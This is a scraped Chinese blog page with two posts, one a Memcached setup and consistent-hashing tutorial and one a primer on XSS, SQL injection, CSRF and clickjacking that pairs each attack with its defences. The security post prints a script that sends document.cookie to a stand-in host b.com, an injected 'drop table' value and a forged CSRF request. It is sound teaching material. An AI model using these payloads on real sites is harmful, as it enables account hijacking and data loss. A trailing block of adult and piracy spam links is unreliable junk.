<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    不急不徐,持之以恒。

    http://blog.gopersist.com/

      BlogJava :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理 ::
      24 隨筆 :: 0 文章 :: 52 評論 :: 0 Trackbacks

    2015年4月25日 #

    互聯網上的應用、網站,隨著用戶的增長,功能的增強,會導致服務器超載,響應變慢等問題。緩存技術是減輕服務器壓力、加快服務響應時間、提升用戶體驗的有效途徑。Memcached是非常流行的緩存系統,這里介紹對Memcached的安裝、設定,以及在集群環境下的使用。

    Memcached簡介

    Memcached是一個開源、高性能、分布式的內存緩存系統,用于加速動態網站的訪問,減輕數據庫負載。

    Memcached使用了Slab Allocator的機制分配、管理內存,解決了內存碎片的問題。

    Memcached雖然可以在多線程模式下運行,但線程數通常只需設定為與CPU數量相同,這一點與Nginx的設定類似。

    Memcached使用

    安裝:

    在CentOS下使用下面的命令安裝:

    sudo yum install memcached 

    啟動:

    memcached -m 100 -p 11211 -d -t 2 -c 1024 -P /tmp/memcached.pid 

    -m 指定使用的內存容量,單位MB,默認64MB。

    -p 指定監聽的TCP端口,默認11211。

    -d 以守護進程模式啟動。

    -t 指定線程數,默認為4。

    -c 最大客戶端連接數,默認為1024。

    -P 保存PID文件。

    關閉:

    kill `cat /tmp/memcached.pid` 

    測試:

    使用telnet連接memcached服務。

    telnet localhost 11211 

    存儲命令格式:

    set foo 0 0 4 abcd STORED  <command name> <key> <flags> <exptime> <bytes> <data block>  <command name> set, add, replace等 <key> 關鍵字 <flags> 整形參數,存儲客戶端對鍵值的額外信息,如值是壓縮的,是字符串,或JSON等 <exptime> 數據的存活時間,單位為秒,0表示永遠 <bytes> 存儲值的字節數 <data block> 存儲的數據內容 

    讀取命令格式:

    get foo VALUE foo 0 4 abcd END  <command name> <key>  <command name> get, gets。gets比get多返回一個數字,這個數字檢查數據有沒有發生變化,當key對應的數據改變時,gets多返回的數字也會改變。 <key> 關鍵字  返回的數據格式:  VALUE <key> <flags> <bytes> 

    CAS(checked and set):

    cas foo 0 0 4 1 cdef STORED  cas <key> <flags> <exptime> <bytes> <version>  除最后的<version>外,其他參數與set, add等命令相同,<version>的值需要與gets獲取的值相同,否則無法更新。 incr, decr可對數字型數據進行原子增減操作。 

    全局統計信息

    stats STAT pid 10218 STAT time 1432611519 STAT curr_connections 6 STAT total_connections 9 STAT connection_structures 7 STAT reserved_fds 10 STAT cmd_get 5 STAT cmd_set 1 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 3 STAT get_misses 2 STAT delete_misses 0 STAT delete_hits 0 ... END 

    Memcached集群

    Memcached本身不做任何容錯處理,對故障節點的處理方式完全取決于客戶端。對Memcached的客戶端來說,不能使用普通的哈希算法(哈希取模)來尋找目標Server,因為這樣在有緩存節點失效時,會導致大面積緩存數據不可用。如下圖:

    當Server3失效后,客戶端需要根據可用Server數量重新計算緩存的目標Server,這時,Key的哈希值為10的數據被指定為由Server1維護,這時原本Server2上可用的緩存也無效了。

    一致性哈希算法

    一致性哈希算法解決了在動態變化的緩存環境中,定位目標Server的問題,通常的實現可將它想像成一個閉合的環形。如下圖:

    當有節點失效時,不會影響到正常工作的緩存服務器,只有原本分配到失效節點的緩存會被重新分配到下一個節點。如下圖:

    微信訂閱號:
    原文地址:http://blog.gopersist.com/2015/05/28/memcached/

    posted @ 2015-05-31 17:18 老林 閱讀(1576) | 評論 (2)編輯 收藏

    對于一個Web應用來說,可能會面臨很多不同的攻擊。下面的內容將介紹一些常見的攻擊方法,以及面對這些攻擊的防御手段。

    一、跨站腳本攻擊(XSS)

    跨站腳本攻擊的英文全稱是Cross Site Script,為了和樣式表區分,縮寫為XSS。發生的原因是網站將用戶輸入的內容輸出到頁面上,在這個過程中可能有惡意代碼被瀏覽器執行。

    跨站腳本攻擊可以分為兩種:

    1). 反射型XSS

    它是通過誘使用戶打開一個惡意鏈接,服務端將鏈接中參數的惡意代碼渲染到頁面中,再傳遞給用戶由瀏覽器執行,從而達到攻擊的目的。如下面的鏈接:

    http://a.com/a.jsp?name=xss<script>alert(1)</script> 

    a.jsp將頁面渲染成下面的html:

    Hello xss<script>alert(1)</script> 

    這時瀏覽器將會彈出提示框。

    2). 持久型XSS

    持久型XSS將惡意代碼提交給服務器,并且存儲在服務器端,當用戶訪問相關內容時再渲染到頁面中,以達到攻擊的目的,它的危害更大。

    比如,攻擊者寫了一篇帶惡意JS代碼的博客,文章發表后,所有訪問該博客文章的用戶都會執行這段惡意JS。

    Cookie劫持

    Cookie中一般保存了當前用戶的登錄憑證,如果可以得到,往往意味著可直接進入用戶帳戶,而Cookie劫持也是最常見的XSS攻擊。以上面提過的反射型XSS的例子來說,可以像下面這樣操作:

    首先誘使用戶打開下面的鏈接:

    http://a.com/a.jsp?name=xss<script src=http://b.com/b.js></script> 

    用戶打開鏈接后,會加載b.js,并執行b.js中的代碼。b.js中存儲了以下JS代碼:

    var img = document.createElement("img"); img.src = "http://b.com/log?" + escape(document.cookie); document.body.appendChild(img); 

    上面的代碼會向b.com請求一張圖片,但實際上是將當前頁面的cookie發到了b.com的服務器上。這樣就完成了竊取cookie的過程。

    防御Cookie劫持的一個簡單的方法是在Set-Cookie時加上HttpOnly標識,瀏覽器禁止JavaScript訪問帶HttpOnly屬性的Cookie。

    XSS的防御

    1). 輸入檢查

    對輸入數據做檢查,比如用戶名只允許是字母和數字,郵箱必須是指定格式。一定要在后臺做檢查,否則數據可能繞過前端檢查直接發給服務器。一般前后端都做檢查,這樣前端可以擋掉大部分無效數據。

    對特殊字符做編碼或過濾,但因為不知道輸出時的語境,所以可能會做不適當的過濾,最好是在輸出時具體情況具體處理。

    2). 輸出檢查

    對渲染到HTML中內容執行HtmlEncode,對渲染到JavaScript中的內容執行JavascriptEncode。

    另外還可以使用一些做XSS檢查的開源項目。

    二、SQL注入

    SQL注入常常會聽到,它與XSS類似,是由于用戶提交的數據被當成命令來執行而造成的。下面是一個SQL注入的例子:

    String sql = "select * from user where username = '" + username + "'"; 

    像上面的SQL語句,如果用戶提交的username參數是leo,則數據庫執行的SQL為:

    select * from user where username = 'leo' 

    但如果用戶提交的username參數是leo’; drop table user–,那執行的SQL為:

    select * from user where username = 'leo'; drop table user--' 

    在查詢數據后,又執行了一個刪除表的操作,這樣的后果非常嚴重。

    SQL注入的防御

    防止SQL注入最好的方法是使用預編譯語句,如下面所示:

    String sql = "select * from user where username = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); ResultSet results = pstmt.executeQuery(); 

    不同語言的預編譯方法不同,但基本都可以處理。

    如果遇到無法使用預編譯方法時,只能像防止XSS那樣對參數進行檢查和編碼。

    三、跨站請求偽造(CSRF)

    跨站請求偽造的英文全稱是Cross Site Request Forgery,是由于操作所需的所有參數都能被攻擊者得到,進而構造出一個偽造的請求,在用戶不知情的情況下被執行。看下面一個例子:

    如果a.com網站需要用戶登錄后可以刪除博客,刪除博客的請求地址如下:

    GET http://a.com/blog/delete?id=1 

    當用戶登錄a.com后,又打開了http://b.com/b.html,其中有下面的內容:

    <img src="http://a.com/blog/delete?id=1"/> 

    這時會以用戶在a.com的身份發送http://a.com/blog/delete?id=1,刪除那篇博客。

    CSRF的防御

    1. 驗證碼

    CSRF是在用戶不知情的情況下構造的網絡情況,驗證碼則強制用戶與應用交互,所以驗證碼可以很好得防止CSRF。但不能什么請求都加驗證碼。

    1. referer檢查

    檢查請求header中的referer也能幫助防止CSRF攻擊,但服務器不是總能拿到referer,瀏覽器可能出于安全或隱私而不發送referer,所以也不常用。倒是圖片防盜鏈中用得很多。

    1. Anti CSRF Token

    更多的是生成一個隨機的token,在用戶提交數據的同時提交這個token,服務器端比對后如果不正確,則拒絕執行操作。

    四、點擊劫持(ClickJacking)

    點擊劫持是從視覺上欺騙用戶。攻擊者使用一個透明的iframe覆蓋在一個網頁上,誘使用戶在該網頁上操作,而實際點擊卻是點在透明的iframe頁面。

    點擊劫持延伸出了很多攻擊方式,有圖片覆蓋攻擊、拖拽劫持等。

    點擊劫持的防御

    針對iframe的攻擊,可使用一個HTTP頭:X-Frame-Options,它有三種可選值:

    • DENY: 禁止任何頁面的frame加載;
    • SAMEORIGIN:只有同源頁面的frame可加載;
    • ALLOW-FROM:可定義允許frame加載的頁面地址。

    針對圖片覆蓋攻擊,則注意使用預防XSS的方法,防止HTML和JS注入。

    微信訂閱號:
    原文地址:http://blog.gopersist.com/2015/04/25/web-security-4/

    posted @ 2015-04-25 15:40 老林 閱讀(6290) | 評論 (2)編輯 收藏

    主站蜘蛛池模板: 毛片A级毛片免费播放| 免费国产99久久久香蕉| 国产免费看JIZZ视频| 亚洲大香伊人蕉在人依线| 30岁的女人韩剧免费观看| 7777久久亚洲中文字幕蜜桃| 99在线视频免费| 亚洲福利秒拍一区二区| 青青青国产在线观看免费网站| 亚洲国产精品成人精品软件| 日韩欧毛片免费视频| 亚洲午夜精品久久久久久app| 成**人免费一级毛片| 国产av无码专区亚洲av毛片搜| 日韩亚洲国产二区| 无遮挡国产高潮视频免费观看| 亚洲日韩中文字幕在线播放| 精品四虎免费观看国产高清午夜 | 老子影院午夜伦不卡亚洲| 在线观看91精品国产不卡免费| 免费一级全黄少妇性色生活片 | 59pao成国产成视频永久免费| 亚洲理论在线观看| 卡一卡二卡三在线入口免费| 春意影院午夜爽爽爽免费| 亚洲av日韩av高潮潮喷无码| 性短视频在线观看免费不卡流畅 | 青青青国产在线观看免费| 亚洲aⅴ无码专区在线观看春色| 亚洲毛片网址在线观看中文字幕 | 三级毛片在线免费观看| 337p日本欧洲亚洲大胆色噜噜 | 免费观看又污又黄在线观看| 亚洲国产美女精品久久久久∴| 国产四虎免费精品视频| 亚洲AⅤ男人的天堂在线观看| 亚洲国产另类久久久精品黑人| 波多野结衣免费在线观看| a在线视频免费观看在线视频三区| 亚洲精品制服丝袜四区| 免费视频中文字幕|